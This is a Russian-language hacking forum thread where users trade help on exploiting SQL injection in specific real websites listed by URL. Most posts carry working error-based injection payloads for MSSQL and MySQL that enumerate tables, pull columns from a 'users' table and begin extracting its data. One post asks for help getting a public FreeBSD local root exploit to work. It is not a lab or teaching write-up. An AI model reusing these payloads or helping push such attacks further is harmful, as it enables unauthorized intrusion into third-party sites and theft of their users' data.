может кто поможет =)) никак не смог раскрутить http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777' http://www.scottishfuturestrust.org.uk/news.asp?id=1' http://www.ncm.org.uk/news.asp?id=1' иль не раскручиваемые инъекции???
2 pinch http://www.scottishfuturestrust.org.uk/news.asp?id=(SELECT+top+1+table_name+from+information_schema.tables)--
Microsoft OLE DB Provider for SQL Server error '80040e14' Incorrect syntax near 'SEL'. /news.asp, line 83
хммм.... у меня не катит... Microsoft OLE DB Provider for SQL Server error '80040e14' Incorrect syntax near 'SEL'. /news.asp, line 83
o sorry не прав http://www.scottishfuturestrust.org.uk/news.asp?id=(SELECT+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('SEL'))--
помогите раскрутить доконца плз = \ _http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+222,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+.html Вот допустим с этой таблицы нужно узнать колонки и что в них = \ подскажи как дальше капать?
http://sng.by/articles/439%27+and+(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name=0x6962665F61646D696E5F6C6F6773+limit+6,1),floor(rand(0)*2))+from+information_schema.columns%20+group+by+2)a)--+.html
немогу понять = \ подставляю вместо 0x6962665F61646D696E5F6C6F6773 вот это 0x57365727300 а т.е. таблица users(она есть) но ничего не показывает (всмысле колонки) тупо сайт открывается = \ что не так делаю? = \
вывожу таблицы. версия мускула 5я. при выводе таблиц окончание съедается. допустим. user_1, user_2, use как можно вывести все? пользуюсь так group_concat(table_name)
Значит так, хотел порутать фряху выбрал (http://www.exploit-db.com/exploits/10255). SH файл исполнять не хотел, решил вручную. Делал все по порядку, ошибки были те же, что и на странице с плоентом, НО когда запустил ./env выелетло: /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; aborting "/libexec/ld-elf.so.1: environment corrupt; missing value for" - такая же ошибка вылетает и у автора плоента, но вот по след. ошибке видно, что все сбрассывается. Можете объяснить почему, пожалуйста?
_http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name=0x7573657273+limit+2,1),floor(rand(0)*2))+from+information_schema.columns+group+by+2)a)--+.html Подскажите как теперь составить запрос что бы выводить данные из колонок? пжлст = \
http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+КОЛОНКА+from+users+limit+0,1),floor(ran d(0)*2))+from+information_schema.tables+group+by+ 2)a)--+.html
